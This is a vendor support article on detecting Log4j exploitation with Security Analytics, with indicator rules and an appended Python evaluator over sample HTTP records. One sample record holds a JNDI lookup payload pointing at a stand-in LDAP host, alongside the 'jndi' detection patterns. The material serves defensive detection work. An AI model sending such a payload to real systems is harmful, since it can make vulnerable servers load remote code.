Can the Log4j vulnerability be detected by Security Analytics?
Article ID: 231725

Products

Security Analytics

Issue/Introduction

With the details of the Log4j vulnerability published in late 2021, analysts are interested in using Security Analytics to detect whether they have been compromised through it. Fortunately, Security Analytics itself is not vulnerable (see Log4j2 vulnerability in Security Analytics? for details).

There are multiple ways to use Security Analytics to detect possible infiltration via the Log4j vulnerability; the following are a few suggestions of what you could do and are by no means a comprehensive solution.

Resolution

Log4j exploit attempts typically carry the string "jndi" in the HTTP headers, so you could add a rule with http_uri~jndi or user_agent~jndi. The attack uses two flows. In the first flow, user_agent~jndi would be present. In the second flow, the class files are downloaded. The first flow is much easier to detect, since the second appears to be LDAP-related.

If you want to find .class files that were served over LDAP, create two indicators:

Indicator 1:  log4j_ua_ext (or whatever name you prefer)

  1. Add the following two filters:
    1. user_agent~java
    2. file_extension=class

Indicator 2:  log4j_ua_mime (or whatever name you prefer)

  1. Add the following two filters:
    1. user_agent~java
    2. mime_type="application/java-vm"   (the double quotes are mandatory on the mime_type)

Create a log4j_rule and add the two indicators above and specify the Type as Alert.
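The rule above, as an added example that is not Security Analytics' own rule engine: a small Python evaluator that applies the article's filters to HTTP metadata records and raises the log4j_rule alert when any indicator matches. The field names, the `~` (case-insensitive substring) and `=` (exact match) semantics, and the sample records are assumptions for illustration.

```python
# Added example: evaluate the article's Log4j indicators over constructed HTTP
# metadata records. Field names, operator semantics and sample data are assumed.

# Each indicator is a list of (field, operator, value) filters that must ALL match.
INDICATORS = {
    # First flow: the JNDI lookup string appears in a header or the URI.
    "log4j_ua_jndi": [("user_agent", "~", "jndi")],
    "log4j_uri_jndi": [("http_uri", "~", "jndi")],
    # Second flow: a Java client fetching a .class file (served over LDAP).
    "log4j_ua_ext": [("user_agent", "~", "java"), ("file_extension", "=", "class")],
    "log4j_ua_mime": [("user_agent", "~", "java"), ("mime_type", "=", "application/java-vm")],
}


def filter_matches(record, field, op, value):
    """'~' is a case-insensitive substring test; '=' is an exact comparison (assumed)."""
    actual = record.get(field, "")
    if op == "~":
        return value.lower() in actual.lower()
    if op == "=":
        return actual == value
    raise ValueError(f"unknown operator {op!r}")


def matched_indicators(record):
    """Names of all indicators whose filters all hold for this record."""
    return [name for name, filters in INDICATORS.items()
            if all(filter_matches(record, *f) for f in filters)]


def evaluate_rule(records):
    """log4j_rule (Type: Alert): one alert per record matching any indicator."""
    return [(i, hits) for i, r in enumerate(records) if (hits := matched_indicators(r))]


# Constructed sample records (not real traffic); hostnames use a reserved TLD.
SAMPLE_RECORDS = [
    {"user_agent": "${jndi:ldap://example.invalid/a}", "http_uri": "/api/login",
     "file_extension": "", "mime_type": "text/html"},
    {"user_agent": "Java/1.8.0_181", "http_uri": "/Exploit.class",
     "file_extension": "class", "mime_type": "application/java-vm"},
    {"user_agent": "Mozilla/5.0", "http_uri": "/index.html",
     "file_extension": "html", "mime_type": "text/html"},
    {"user_agent": "Java/11", "http_uri": "/lib/app.jar",
     "file_extension": "jar", "mime_type": "application/java-archive"},
]

if __name__ == "__main__":
    for idx, hits in evaluate_rule(SAMPLE_RECORDS):
        print(f"ALERT log4j_rule: record {idx} matched {hits}")
```

Like the article's filters, `~` here is a literal substring test, so a hit is a trigger for investigation rather than a confirmation of compromise.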